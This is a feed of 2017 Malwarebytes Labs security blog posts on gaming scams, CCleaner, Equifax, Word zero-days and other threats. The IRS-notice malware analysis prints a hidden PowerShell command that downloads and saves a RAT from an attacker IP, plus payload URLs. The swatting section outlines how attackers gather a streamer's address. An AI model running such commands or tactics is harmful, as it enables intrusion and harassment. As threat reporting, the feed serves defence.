Techie Feeds

Don’t let these gaming threats give you a Game Over

Malwarebytes - Thu, 09/21/2017 - 20:24

With EGX, the biggest gaming event in the UK opening its doors today, we thought it’d be timely to remind you of some of the threats currently facing gamers. No matter what type of game, client, or system you use, there’s always something waiting to try and give you a bad day where the safety of your account is concerned.

GTAV cash generators

Some games, like GTAV, involve an amount of “grinding” (performing potentially repetitive tasks) to get what you want. In this case, incredibly expensive items/additional content which are free to download, but cost in-game money to make use of. In GTAV, you can buy in-game currency with real money to speed up the process, grind, or turn to the internet in search of free money tools. While modders in game sessions can – and do – spawn money from the sky, or only add cash to your account, the huge pile of YouTube videos and web comments claiming to offer free services online are all fake. The so-called money generators are merely survey scams, which lead to requests for personal information or downloadable files (which may or may not be malicious).

Steam scams

These are very popular, especially with accounts being able to buy and sell (expensive) digital items for various titles, adding extra desirability to scammers wanting to make a quick buck. Phishing is a mainstay of Steam scams; other attacks, such as swiping a Steam SSFN file to bypass Steam Guard are much more sophisticated. Be wary of fake item trades, especially if they don’t lead to an official Steam URL – you may well be looking at a static phishing page, or one which scrapes some elements from the real thing to appear legitimate.

Read: Something’s phishy: How to detect phishing attempts


The act of sending armed law enforcement round to a game streamer’s house, which could potentially be fatal. Streamers usually get caught by this by being too open with their personal information – quite often, you’ll find out all you need to know about your target simply by listening to them stream. Before you know it, they’ll have casually mentioned locations, even nearby streets where their friends live, and much more besides. Calls to said friends pretending to be someone else, for example, will fill in the missing pieces of the puzzle.

Ironically, the main way to avoid swatting (for the most part) is to tell people who make a living out of talking, to stop talking about themselves (just a little bit). This is no guarantee of safety; many other ways exist to obtain a home address via publicly available information. All in all, Streaming is a bit of a dangerous past-time.

Game company hacks

There’s not a huge amount you can do when the gatekeepers of your data get popped, but that doesn’t mean you should be complacent. Many game companies and hardware makers now offer additional forms of security such as key fobs and two-factor authentication, which you should make use of whenever possible. You may also wish to use a password manager to ensure you’re not just reusing the same passwords everywhere, which could lead to additional compromises. Modern gaming can require multiple passwords across different gaming platforms just to play one game, so it’s fairly common to see video game password burnout – don’t fall for it!

Fake emulators

It’s becoming increasingly difficult to obtain old game consoles, much less play the original titles. Even on consoles where backwards compatibility exists, titles differ from how they were originally, or licensed music has been replaced, or the control scheme is different, or maybe it works on this console but not that mobile properly, and anyway its funded by ads, and so on.

Entering stage left: fake emulators. It is still challenging to emulate most of the last generation (or two) of consoles, and you should be extremely wary where such claims are concerned.

These are some of the most common problems we see on a daily basis in gaming land; feel free to offer up some of the scams you’ve seen doing the rounds in the comments below. Safe gaming!


The Malwarebytes Labs Team

The post Don’t let these gaming threats give you a Game Over appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Fake IRS notice delivers customized spying tool

Malwarebytes - Thu, 09/21/2017 - 15:00

While macro-based documents and scripts make up for the majority of malspam attacks these days, we also see some campaigns that leverage documents embedded with exploits. Case in point, we came across a malicious Microsoft Office file disguised as a CP2000 notice. The Internal Revenue Service (IRS) usually mails out this letter to taxpayers when information is incorrectly reported on a previous return.

Victims that fall for the scam will infect themselves with a custom Remote Administration Tool. A RAT can be utilized for legitimate purposes, for example by a system administrator, but it can also be used without a user’s consent or knowledge to remotely control their machine, view and delete files or deploy a keylogger to silently capture keystrokes.

In this blog post, we will review this exploit’s delivery mechanism and take a look at the remote tool it deploys.


The malicious document is hosted on a remote server and users are most likely enticed to open it via a link from a phishing email. The file contains an OLE2 embedded link object which retrieves a malicious HTA script from a remote server and executes it. In turn, it downloads the final payload, all with very little user interaction required since it is using CVE-2017-0199, first uncovered in April 2017 as a zero-day.


The embedded link points to an HTA script hosted under an unexpected location – a Norwegian company’s compromised FTP server – which invokes PowerShell to download and execute the actual malware payload.

ftp://lindrupmartinsen[.]no:21/httpdocs/test/template.hta "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden (New-Object System.Net.WebClient) .DownloadFile('http://82.211.30[.]108/css/intelgfx.exe', 'C:\Users\[username]\AppData\Roaming\62962.exe'); Payload

The downloaded payload (intelgfx.exe) extracts to several components into a local folder and achieves persistence using a decoy shortcut. The VBS scripts ensure that the main module runs without showing its GUI, in order to remain invisible to the victim.

RMS agent stands for Remote Manipulator System and is a remote control application made by a Russian company. It appears that in this case, the attackers took the original program (as pictured below) and slightly customized it, not to mention the fact that they are using it for nefarious purposes, namely spying on their victims.

Its source code shows the debugging path information and name that they gave to the module.

Office exploits and RATs

This is not the first time that CVE-2017-0199 is used to distribute a RAT. Last August, TrendMicro described an attack where the same exploit was adapted for PowerPoint and used to deliver the REMCOS RAT. It also shows that threat actors often repackage existing toolkits – which can be legitimate – and turn them into full-fledged spying applications.

We reported the compromised FTP server to its owner. Malwarebytes users were already protected against CVE-2017-0199 as well as its payload which is detected as Backdoor.Bot.

Thanks to @hasherezade for help with payload analysis.

Indicators of compromise

Word doc CVE-2017-0199

82.211.30[.]108/css/CP2000IRS.doc 47ee31f74b6063fab028111e2be6b3c2ddab91d48a98523982e845f9356979c1

HTA script

ftp://lindrupmartinsen[.]no:21/httpdocs/test/template.hta d01b6d9507429df065b9b823e763a043aa38b722419d35f29a587c893b3008a5

Main package (intelgfx.exe)

82.211.30[.]108/css/intelgfx.exe 924aa03c953201f303e47ddc4825b86abb142edb6c5f82f53205b6c0c61d82c8

RAT module


Other IOCs from same distribution server

82.211.30[.]108/estate.xml 82.211.30[.]108/css/qbks.exe

The post Fake IRS notice delivers customized spying tool appeared first on Malwarebytes Labs.

Categories: Techie Feeds

FTC providing partial refunds for Advanced Tech Support victims

Malwarebytes - Wed, 09/20/2017 - 15:00

Last month, the FTC announced the recovery of 10 million dollars from Advanced Tech Support, one of the most successful US-based tech support scammers ever. This money will be put towards partial refunds for victims of ATS who purchased products or services from them between April 2012 and November 2014. Per the FTC announcement, the deadline for a refund is October 27. To repeat:

The deadline for a refund application is October 27.

Restitution from Advanced Tech Support is notable because most scams based in the United States structure their finances such that only a small core of founders ever see a significant profit. These founders then tend to spend most of their money on extravagant parties, vacations, and other ostentatious displays of wealth – leaving very little to recover. Due to these factors, it’s noteworthy that the FTC was able to recover any significant amount of money at all.

Advanced Tech Support, otherwise known as Inbound Call Experts, has had a lengthy history with Florida law enforcement and the FTC. Check out their case history here, where you can follow the long road it took to bring this company to justice.  And remember:

The deadline for a refund application is October 27.

The post FTC providing partial refunds for Advanced Tech Support victims appeared first on Malwarebytes Labs.

Categories: Techie Feeds

How to tell if your Mac is infected

Malwarebytes - Tue, 09/19/2017 - 15:00

There are a lot of reasons Mac users don’t sweat getting infected. One: They’ve got a built-in anti-malware system called XProtect that does a decent job of catching known malware. Two: Macs are not plagued by a high number of attacks. (Most cybercriminals are focused on infecting PCs.) And three: There’s just not a lot of Mac malware out there.

But that’s changing, and fast: Mac malware has increased by 230 percent in the last year alone. Most Mac users don’t know this, and assume their Mac is fine. For those folks we have one word: adware.

Your Mac is infected…with adware

Adware is software that’s designed to display advertisements, usually within a web browser. Most people don’t willingly download programs whose sole purpose is to bombard you with ads, so adware has to sneak its way onto your Mac. It either disguises itself as legitimate or piggybacks on another program in order to be installed.

Once in your system, adware changes the way your browser behaves by injecting ads into web pages, causing pop-up windows or tabs to open, and changing your homepage or search engine—all in the name of funneling advertising dollars away from companies who pay for online ads and into their own accounts.

Your Mac is infected…and not protected

Sounds pretty shady, right? So why doesn’t the Mac anti-malware program catch these guys? Typically, the makers of adware are hiding in plain sight, operating as actual corporations who claim to sell software on the level. They get away with it because their adware is often hidden in the fine print of a long installation agreement that most people skip over. Is it technically legal? Yes. You accepted the terms of the installment so they can spam you all they want. But is it right? So far, Apple hasn’t stepped in to crack down on it. But if you ask us, the answer is an emphatic “no.”

In addition to adware, other potentially unwanted programs, such as so-called “legitimate” keyloggers, scammy “cleaning” apps, and faux antivirus programs that don’t actually detect anything are skirting the Mac protections in place. (Because XProtect doesn’t detect and block adware or potentially unwanted programs—only malware that it has seen before.) So if a new form of malware makes its way onto your computer before Apple has a chance to learn about it and write code to protect against it, then you’re out of luck.

So if you ask us, it’s time to start taking a closer look at your Mac. Is it acting the way your sturdy, reliable Mac has always behaved? Or is it exhibiting classic signs of guilt? If something seems a little off, you just might have a problem. Let’s take a look at the telltale signs that your Mac is infected.

Signs of adware

Advertisements are displayed in places they shouldn’t be, literally popping up everywhere. Your web browser’s homepage has been mysteriously changed without your permission. Web pages that you typically visit are not displaying properly, and when you click on a website link, you get redirected to an entirely different site. In fact, even your search engine has been replaced with a different one. If your web browser, search engine, or websites are acting in funky, unpleasant ways, you’ve likely got yourself an adware infection.

Signs of PUPs

Maybe you downloaded a new program to monitor your family’s behavior online. All of a sudden, new icons are appearing on your desktop for software you don’t remember installing. New toolbars, extensions, or plugins are added to your browser. A pop-up appears telling you your Mac may be infected, and you need to install the latest antivirus immediately to get rid of it. Frightened, you do so, and now your computer has turned the corner from automatically installing apps to slowing to a crawl. What’s going on? These are PUPs, and your Mac’s anti-malware system is not going to get rid of them.

Signs of malware

Mac malware making its way onto your system is, right now, relatively rare. But if it does, you may look out for similar behavior as an infected Windows operating system: your computer’s processing power seems diminished, software programs are sluggish, your browser redirects or is unresponsive, or your ole-reliable starts crashing regularly.

In some cases, you may not be aware of an infection at all. While your computer hums along, info stealers operate quietly in the background, stealing your data for an attack on your bank accounts or identity.

And in the worst case scenario, your Mac can even be infected with ransomware. In March 2016, the first Mac ransomware was spotted, and it was downloaded by thousands of users before Apple had a chance to shut it down. A ransomware attack would be quite obvious to Mac users. Files would be encrypted and cybercriminals would deliver a ransom demand (usually via pop-up) in order to return your data.

Do any of these scenarios sound familiar to you? If so, there are a few steps you can take to remedy the infection. First, back up your files. Next, download a (legitimate) anti-malware program such as Malwarebytes for Mac that’s designed to search and destroy adware, PUPs, and any new forms of malware lurking on the scene. Run a scan and, if there are any nasties hiding away in your pristine Mac OS, it’ll bag, tag, and dump them for you. Then you can finally get your Mac back.

The post How to tell if your Mac is infected appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (September 11 – September 17)

Malwarebytes - Mon, 09/18/2017 - 22:10

Last week, we dug into phishing campaigns done via Linkedin accounts, remediation versus prevention, issues with smart syringe pumps, and advised you to go patch against a Word 0day. We had some tips regarding identity theft protection, explored crowdsourced fraud, and explained YARA rules.


Consumer News

Stay safe!

Malwarebytes Labs Team

The post A week in security (September 11 – September 17) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Infected CCleaner downloads from official servers

Malwarebytes - Mon, 09/18/2017 - 15:31

In a supply chain attack that may be unprecedented in the number of downloads, servers hosting CCleaner, a popular tool for cleaning up the PC, has been delivering a version of the said software with malware.

What happened?

Threat actors have managed to change the files that were being delivered by Avast servers hosting CCleaner updates. In case you are wondering why they were on those servers, Avast acquired Piriform, the original publishers of CCleaner, a few months ago.

The incident was discovered and reported by Talos. Piriform is aware of the situation and is acting to prevent further damage. They are also investigating how the files coming from their servers were modified before being released to the public.

Possible impact

It is difficult to say at this moment how many users might have been affected, but the numbers could be huge. From the statistics brought out by Piriform, CCleaner has been downloaded 2 billion times in total, 5 million times every week. The modified version, 5.33, is made available from August 15 until September 12 when version 5.34 was released. In a press statement the company estimates that 2.27 million people used the affected software.

The malware

The malware collects the following information about the infected system:

  • Computer name
  • A list of installed software, including Windows updates
  • A list of the currently running processes
  • The MAC addresses of the first three network adapters
  • Other system information that is relevant for the malware like admin privileges, whether it is a 64-bit system, etc.

The malware uses a hardcoded C2 server and a domain generating algorithm (DGA) as a backup, to send information about the affected system and fetch the final payload.

What to do if you think you are affected?

First of all, check the version of CCleaner on your system. If you suspect you may have downloaded CCleaner version 5.33.6162 or CCleaner Cloud version 1.07.3191, scan your system for malware.


CCleaner users that are running older versions or that do not trust the one they are using now are encouraged to update their CCleaner software to version 5.34 or higher. The latest version is available for download here.

Affected versions: CCleaner version 5.33.6162 and CCleaner Cloud version 1.07.3191

Malwarebytes blocks the IP and domains related to this malware. We also remove the malicious installer.

Stay safe!


Pieter Arntz

The post Infected CCleaner downloads from official servers appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Explained: YARA rules

Malwarebytes - Fri, 09/15/2017 - 15:00

YARA rules are a way of identifying malware (or other files) by creating rules that look for certain characteristics. YARA was originally developed by Victor Alvarez of Virustotal and is mainly used in malware research and detection. It was developed with the idea to describe patterns that identify particular strains or entire families of malware.


Each rule has to start with the word rule, followed by the name or identifier. The identifier can contain any alphanumeric character and the underscore character, but the first character is not allowed to be a digit. There is a list of YARA keywords that are not allowed to be used as an identifier because they have a predefined meaning.


Rules are composed of several sections. The condition section is the only one that is required. This section specifies when the rule result is true for the object (file) that is under investigation. It contains a Boolean expression that determines the result. Conditions are by design Boolean expressions and can contain all the usual logical and relational operators. You can also include another rule as part of your conditions.


To give the condition section a meaning you will also need a strings section. The strings sections is where you can define the strings that will be looked for in the file. Let’s look at an easy example.

rule vendor
$text_string1 = “Vendor name” wide
$text_string2 = “Alias name” wide
$text_string1 or $wide_string2

The rule shown above is named vendor and looks for the strings “Vendor name” and “Alias name”. If either of those strings is found, then the result of the rule is true.

There are several types of strings you can look for:

  • Hexadecimal, in combination with wild-cards, jumps, and alternatives.
  • Text strings, with modifiers: nocase, fullword, wide, and ascii.
  • Regular expressions, with the same modifiers as text strings.

There are many more advanced conditions you can use, but they are outside the scope of this post. If you would like to know more you can find it in the YARA documentation.


Metadata can be added to help identify the files that were picked up by a certain rule. The metadata identifiers are always followed by an equal sign and the set value. The assigned values can be strings, integers, or a Boolean value. Note that identifier/value pairs defined in the metadata section can’t be used in the condition section, their only purpose is to store additional information about the rule.


YARA is a tool that can be used to identify files that meet certain conditions. It is mainly in use by security researchers to classify malware.


Signature-Based Detection With YARA

Latest YARA documentation

YARA: Simple and Effective Way of Dissecting Malware

Screenshots were made using Yara Editor by Adlice Software

Pieter Arntz

The post Explained: YARA rules appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Crowdsourced fraud and kickstarted scams

Malwarebytes - Thu, 09/14/2017 - 16:00

Crowdsourced funding opportunities via Kickstarter, Patreon, and GoFundMe have removed many structural roadblocks for people to access capital quickly and conveniently. But they’ve also lowered the barrier to entry for many very old scams. So how do you tell the difference between a great cause or project to contribute to and a digital confidence scam? What’s outright fraudulent, and what’s just a company with poor organizational skills? Let us take a look at pitfalls on two crowdfunding platforms.

GoFundMe primarily serves personal projects and donation pages, or other campaigns that otherwise don’t fit the more common commercial model found on Kickstarter. Funding requests cover a wide range of needs, from community sports groups to disaster relief, to education and medical care (for US users). It sounds like a great use of crowdfunding, but when it comes to fraud, things start to get a little iffy. Here’s what GoFundMe’s terms of service (ToS) have to say about its giving campaigns.

GoFundMe has no control over the conduct of, or any information provided by, a Campaign Organizer or a Charity, and GoFundMe hereby disclaims all liability in this regard to the fullest extent permitted by applicable law.

So as far as they’re concerned, buyer beware. But as a platform, they do have some minimal obligations, as well as some additional rules to not run afoul of some onerous regulations. To summarize their ToS, here’s what you can’t raise money for:

  • Drugs
  • Weapons
  • Any financial product
  • Gambling
  • Hate speech
  • Porn
  • Legal defense
  • Fraud

But wait a minute – how can fraud be on the list if they say they won’t vet campaigns? Because these categories largely are about liability and are included to absolve the platform of after-the-fact responsibility. The first four categories can place GoFundMe under regulatory scrutiny, however, and are most likely patrolled by counter-fraud algorithms. If you’d like to know what GoFundMe considers fraud, you can go to their page on the subject, which oddly does not say anything on the matter. They do have a fraud report form, but it requires proof of intentional deception on the part of the organizer. You can go to for examples of how difficult that is.


Kickstarter does a little bit better regarding fraud, requiring that the creators have an actual production plan and prototype to show backers, and prohibits an extensive list of backer rewards. Most important is the list of creator requirements, in particular:

You [must] have an address, bank account, and government-issued ID based in the country that you’re creating a project in.**

This single requirement raises the barrier to entry for most scammers and gives Kickstarter tools to track and permanently deal with scams that make it into the platform. Further, they claim to vet projects to make sure they meet with company guidelines before they go live. This is great for the vast majority of online scams that are blatantly fraudulent. Their track record on projects whose vetting require domain expertise is considerably worse.

SecuritySnakeOil.Org  is a site devoted to scammy information security projects on Kickstarter. Most of the projects on review combine open source hardware or software, expansive marketing claims, and entry level security flaws. From “unhackable” routers made from a Raspberry Pi running a years old build of Debian, to products that advertise “A custom operative system (OS) to avoid hacking”, what most of these share is an inability to vet them properly with a lack of domain expertise. That is, if you don’t know anything about the field, you would have difficulty evaluating their marketing claims, and the project creators don’t do a lot to help.

Even more legitimate projects, such as this Wi-Fi router with a built in VPN that blocks ads at the perimeter (Neat!), provides no details about any specific technology used in the product. So without adequate, accessible information on what you’re backing, how can you possibly make a safe choice?

What to do about it

Both GoFundMe and Kickstarter offer organizers the ability to link their Facebook account to their pitch. For GoFundMe, this allows you to see if the organizer is, in fact, someone connected to the cause and in a reasonable position to get the funds to the right place. For Kickstarter, Facebook can provide a name to look up an organizer’s employment history (or lack thereof.) But a better question to ask for a project involving an actual product would be this: Are the owner’s claims physically possible?

And lastly, the question that has protected people from fraud for time immemorial: Is this too good to be true?

The post Crowdsourced fraud and kickstarted scams appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Equifax aftermath: How to protect against identity theft

Malwarebytes - Thu, 09/14/2017 - 15:00

Who here is scrambling around in the aftermath of the recent breach at Equifax to figure out if you’ve been compromised? Who here is wondering what to do about it if you are? If you’re one of the 143 million Americans whose data was accessed by cybercriminals, then you probably raised your hand.

Even if you weren’t one of the 143 million, you might still want to take some precautions. You could instead be part of the millions of folks who’ve had their data stolen over the course of online history. Basically, if you have a social security number, have ever run a credit check, or have a pulse, you should listen up. Why? Two words: identity theft.

What could happen?

The Equifax breach gave criminals access to vital personal information, including names, social security numbers, birthdates, addresses, and in some cases, driver’s license IDs and credit card numbers. And here’s just a slice of what those jerks can do with that data:

  • Open financial accounts
  • Apply for credit cards, mortgages, and other financial services
  • Get medical care at your expense
  • File for a tax refund in your name
  • Get a job in your name and let you pay the taxes
  • Steal your benefits
  • All of the above (aka, identity theft)
Who is impacted?

The better question might be, who isn’t? Don’t worry about verifying if your data was stolen—assume it was stolen. This is a decent rule of thumb even before the Equifax breach, but even if that thought never crossed your mind, it’s pretty impossible to verify whether you’ve been impacted at the moment.

The Equifax verification site is currently not returning accurate information. And if you try calling the company now, you might be met with some long waiting times to receive frustratingly vague answers. So if you want to act quickly (and we recommend you do), just bypass the first four stages of grief and go directly to acceptance.

What we do know: Those affected by the breach are predominantly from the US, but there are people from Canada and the UK impacted as well. Some methods that work in one country may not work in others, so please keep in mind that this article is aimed at our US readers. International readers can find some additional information about what to do here.

Steps to protect yourself

Our recommendation is to freeze your credit immediately with all three of the major credit bureaus. By freezing your credit, you’ll prevent criminals from trying to open up new accounts in your name—all of your current credit cards will still work. You’ll only need to consider unfreezing your credit if you want to apply for a loan, open a new credit card, or make any type of purchase that requires a check on your credit.

Three things you’ll want to know before contacting the credit bureaus.

One: You’ll want to pull a credit report. You can get a free report here. It doesn’t matter if you’ve already frozen your accounts, you can still monitor using the free tool. We recommend you pull only one report now, another one in four months, and the third in another four months. It’s not foolproof, but it will allow you to see different reports throughout the year to track any potential changes.

Two: the cost is minimal. While reports have varied—Equifax is offering their credit freeze for free, but it’s pretty hard to get through to them—freezing credit usually only costs a one-time fee of $10 per bureau. That’s 20 or 30 bucks for a whole lot of peace of mind.

Three: You must set or receive PINs when freezing your credit. Save these in a secure location, whether that’s using a password manager or physically storing the printed PIN paper someplace safe and out of sight.

Where to go to freeze your credit Additional monitoring services

The use of additional monitoring services is entirely up to you. The biggest issue is that both legitimate companies trying to help and scammer companies trying to trick will over-hype the danger of identity theft in order to make a sale. Please make sure that you do your homework and research on these companies before signing up blindly out of fear.

When looking up information about how to protect yourself in situations like these, look to sites like the Federal Trade Commission or other technology publications such as Wired, The Verge, or Vice’s Motherboard, as they won’t be trying to upsell you to credit protection you may or may not need. The wrong company might actually hurt your ability to stave off ID theft.

General best practices

We wish we could say that the above advice is going to save you from all the dangers associated with this breach. For credit theft, you are covered, but for all the other threats associated with scammers or fraudsters looking to capitalize on this situation, here are some additional guides on how to avoid their traps.


Be on the alert for credit scams or any related terms. You’ll see these in emails, ads on social sites or games, and even physical mail to your home. These attacks are part of what we refer to as social engineering, and they will run rampant for many months and years to come. Always be skeptical, and if you’re not sure about something, ask a professional.

Phone or text scams

Since your data was most likely taken, that means your numbers will be shared even more than they already are today. Calls and texts from unknown numbers, numbers with similar area codes, or numbers very similar to yours should be treated as potential scams.

You might think that the National Do Not Call Registry would protect you from this. Sadly, it does not. It offers protection from legit companies trying to solicit your business. It does not offer protection against scammers. (Because why would criminals follow the law, anyway?)

my Social Security account

The my Social Security account allows you to keep track of the social security funds you’ll be collecting in the future. Although it was not affected by the Equifax breach, it’s good practice to get this account set up in your name, as someone else could easily grab it and you’d be locked out of your future payments. One caveat: If you want to set up this account, you’ll need to do it before you freeze your credit. (Otherwise they can’t confirm your identity through the account.)

Passwords and two-factor authentication

Ensure you’re using smart password strategy (complex, do not repeat them, do not use the same one across multiple sites/services, etc.) and if available, enable two-factor authentication (2FA) on every account possible. You can check the 2FA availability on your sites and services here.

Enable alerts on your accounts

While your current accounts shouldn’t be impacted by this breach, it’s never a bad idea to keep an eye on your bank accounts and credit cards for larger purchases. For accounts rarely used, you could set alerts to $1 so you’re notified the second any transaction happens. For regular accounts, set the alerts to a dollar amount that would seem out of place for that card, whether it’s $20 or $500.

New phone accounts

A common attack vector with credit/personal data breaches is to purchase new phone accounts through your provider, with your account! Once criminals have your info, they’ll call up the phone company and say they want to add a new line but don’t have a PIN number. If you haven’t set up a PIN number with your phone company already, they have no way to verify your account. So guess what? BAM! There’s a new phone on your bill. In order to protect yourself from this type of attack, go ahead and set up a PIN with your provider.


File these as soon as possible next year! For multiple years we’ve heard about victims of tax return fraud, wherein a scammer using your personal information files YOUR return before you can. So don’t wait on this one.


If you’re affected by the Equifax breach, you have a heightened risk of becoming a victim of identity theft. But at this juncture, the point is moot. Since it’s difficult to discover a definitive answer, it’s best to assume you are and deal with the fallout.

We’ve given you some direction on what to do to avoid identity theft and credit fraud, and we hope you take a deep breath, crack your neck, and get to work nailing your personal info down. One new credit card created by an attacker in your name is going to cause a massive headache. Better to stay ahead of it than spend the next month trying to convince a bank that you didn’t open an account. Good luck, be vigilant and stay safe.


The Malwarebytes Labs team

The post Equifax aftermath: How to protect against identity theft appeared first on Malwarebytes Labs.

Categories: Techie Feeds

PSA: New Microsoft Word 0day used in the wild

Malwarebytes - Wed, 09/13/2017 - 22:49

Microsoft has just patched an important vulnerability in Microsoft Word during its latest patch Tuesday cycle. According to the security firm that found it [1], this new zero-day (CVE-2017-8759) was used in targeted attacks to install a piece of malware known as FinFisher.

Microsoft Office has been in the line of fire throughout the year with malware distributors employing various social engineering techniques to trick users into opening up booby-trapped documents laced with exploits or macros. Indeed, while drive-by download activity has plummeted, malicious spam has been the dominant threat.

In this blog post, we do a quick review of this latest exploit and how future attackers are likely to add it to their own campaigns.

Infection flow

CVE-2017-8759 leverages an improper validation in a parsing module of the Web Services Description Language (WSDL) which leads to arbitrary code injection and execution. As we have seen it many times in previous attacks, mshta.exe is used to retrieve a script and eventually the malware payload.

Figure 1: Traffic view showing script and payload retrieval

Figure 2: Process view showing infection technique

Payload delivery implications

Depending on how the malicious document is delivered, it can require little or no user interaction in order to infect the target. In the former case, the document could be downloaded from a website or come as spam. It would bear the Mark of the Web and be flagged. In the latter case where the document was packaged – for example using 7zip – it could lose that MotW [2].

Figure 3: Side-by-side comparison of the same file, distributed differently.

In the first case, the user will be prompted to “Enable Editing” (which admittedly is less suspicious than enabling macros). This, in turn, will trigger the malicious code to execute.

Figure 4: CVE-2017-8759 attempt blocked (Protected View mode)

In the second case, where the MotW has been lost, the malicious Word document will immediately run its payload:

Figure 5: CVE-2017-8759 attempt blocked (normal mode)

If you haven’t done it yet, we strongly advise you to run Windows updates and apply the latest security patches. If experience serves well, each time a new zero-day is exposed, other online criminals jump in and rush to add it to their arsenal. This means that what was a small and targeted attack can all of the sudden become a widespread campaign.

Malwarebytes users were already protected against this exploit when it was still a zero-day. Additionally, we detect and block the FinFisher malware payload.


[1] FireEye,

[2] Eric Lawrence,

Indicators of compromise

Malicious Word document:




Network traffic:

91.219.236[.]207/img/office.png 91.219.236[.]207/img/word.db 91.219.236[.]207/img/left.jpg

The post PSA: New Microsoft Word 0day used in the wild appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Multiple flaws found in smart syringe pump

Malwarebytes - Wed, 09/13/2017 - 16:27

A syringe pump is a small infusion pump that delivers liquids, either medication or nutrients, in small quantities into the patient’s system. Hospitals, nursing homes, and homes with residents under acute or palliative care use them. Accurate and safe delivery of dosage from a variety of syringes make such a device essential. Unfortunately, a particular model of a wireless smart pump is found to be so vulnerable that a malicious, highly skilled attacker can compromise its communications and therapeutic modules, which in turn could also compromise a patient’s well-being.

Late last week, the Industrial Control Systems Cyber Emergency Response Team (ICS-CERT) released an advisory for the Medfusion 4000 Wireless Syringe Infusion Pump after Scott Gayou, an independent security researcher, brought to light multiple vulnerabilities in the device that can be exploited remotely.

According to Gayou, the said syringe pump has problems with the way it processes data, which could then lead to either the unauthorized execution of code or a system crash. He also pointed out that several credentials are hard-coded to the pump, with some even accessible to anyone if the pump’s communication module is modified. Furthermore, the pump is incapable of validating certificates, making it a good candidate for MiTM attacks, allowing threat actors to bypass any security measures in place and gain elevated privileges on it.

Medfusion 4000 Wireless Syringe Infusion Pump versions 1.1, 1.5, and 1.6 are affected by these vulnerabilities.

Smiths Medical, makers of the said smart pump, has announced that they’ll be releasing version 1.6.1 of the product to address the vulnerabilities above. In the meantime, ICS-CERT has advised users of the Medfusion 4000 syringe pump to take steps to lessen the possibility of exploitation. One advice is to disconnect the pump from the internet altogether.

Smiths Medical and ICS-CERT provided more mitigation steps in this advisory.


The Malwarebytes Labs Team

The post Multiple flaws found in smart syringe pump appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Remediation vs. prevention: How to place your bets

Malwarebytes - Wed, 09/13/2017 - 15:00

Building a security environment for businesses these days is a gamble: layer on too much and your programs may be canceling each other out or causing redundancy (and your leaders may be wondering why you’re spending so much). Invest too little and get breached: it’s snake eyes for you. Whether you choose remediation, proactive prevention, or both, finding the right balance is the key to a winning hand.

What is remediation?

Remediation is the process of correcting system changes, for example, removing threats off of an infected system. These threats bypassed existing security measures and likely already caused damage. The goal is to remediate threats before they cause any further damage.

In most cases, threats have made themselves known in some malicious fashion, making the need to remove them urgent. But the remediation process can potentially last anywhere from hours to days depending on the tools at hand and the resources dedicated to the process.

What is proactive prevention?

Proactive prevention is the ability to block the latest threats before they reach a system or network and cause damage. This form of protection requires technologies that detect and block unknown threats.

This is the most effective security approach in dealing with ransomware attacks. Once ransomware gets onto a system and encrypts the victim’s data, a ransom demand is presented to the victim requiring swift payment in digital currency in order to receive the files back via a decryption key. However, paying the ransom does not guarantee you’ll get your data back.

In rare cases, decryption programs or algorithms (decryptors) are available thanks to the valiant efforts of security researchers. Unfortunately, this reactive approach offers too small of a ray of hope in comparison to the sheer number of ransomware variants that continue to hit the streets every week.

Why are businesses sticking with remediation? Cost

Remediation tools, by nature, are less expensive than full protection. In addition, some businesses are adding remediation tools to run alongside their existing security measures. Due to budget constraints, many IT/Network Administrators wait before deciding on a full protection product.

For instance, a company of any size may be running an existing tool, like antivirus, with a three-year subscription. It may be easier for the company to let the contract run out before purchasing a new, more inclusive product. In this type of situation, adding a remediation tool to the existing security stack provides an additional, incremental value to security capabilities.

SMBs playing the odds

Many businesses assess their potential risk and exposure to attack, and many businesses, especially smaller ones, tend to believe there is less chance of an attack happening to them. In a survey conducted by CNBC and SurveyMonkey on over 2,000 small businesses, only 2 percent of small business owners said they viewed a cyberattack as the most critical issue they face. However, in the last year, malware detections increased more than 165 percent among SMBs.

With limited resources or a short-handed IT staff, small to mid-size businesses also face especially tight budgets on top of risk evaluation, so they need to allocate their spending accordingly. This is what they’ve always done, and they are not alone. Dell recently released a study that stated 53 percent of IT decision makers say cost is one of the biggest constraints to taking additional security measures.

Many believe it is easier to remediate a few errant incidents than to find several security solutions to combat various strains of malware. However, security incidents are increasing in frequency not only with enterprise-level businesses but also among small to mid-size businesses. In Malwarebytes’ recent report of Analysis of Malware Trends for Small to Medium Businesses Q1 2017, it was discovered that ransomware incidents alone rose 231% within the last year among SMBs.

Worst-case scenario

Ransomware is cause for concern for those using remediation-only methods because its damage cannot be undone unless rare decryptors are available. Businesses on a tight budget could compare the cost of proactive prevention tools to the potential ransom demands from a ransomware attack and the projected downtime in productivity. But even that estimation is tricky because there’s no guarantee cybercriminals will provide you with a key, process the transaction, or deliver clean code.

However, it is important to note that even if files are restored, the system or network can still be vulnerable because ransomware can leave behind remnants or the attacker may have planted more malicious code to utilize at a later date on the system. Other options include full wiping and rebuilding of machines and restoring from back up if the files are stored somewhere else, but that takes a lot of time, especially if multiple endpoints were impacted.

If a cyberattack were to hit an unprepared business, it can be a devastating event, causing a loss in productivity, loss of revenue, and even cause damage to the company’s reputation. For malware attacks other than ransomware, remediation tools are useful to run a full scan cleaning damage after the infection. But the truth is this: The remediation-only approach will simply not protect against a major ransomware attack.

How businesses benefit from proactive prevention

Threats are continuing to evolve and traditional security solutions are almost rendered obsolete. In order to effectively block these threats, security has to evolve as well. Here’s how the proactive approach benefits businesses:

1. It avoids risk and damage to endpoints.

With a proactive prevention tool, businesses see the value from the reduction in threat exposure. The less threat exposure, the less risk to the business.

2. It reduces/eliminates manual threat removal.

Forty-five percent of SANS survey respondents say that their prevention, detection, response and remediation processes are still mostly or completely manual. With a proactive prevention security tool, businesses eliminate the need for any manual threat removal because threats are caught earlier on and there are not as many remediation demands.

3. It reduces downtime.

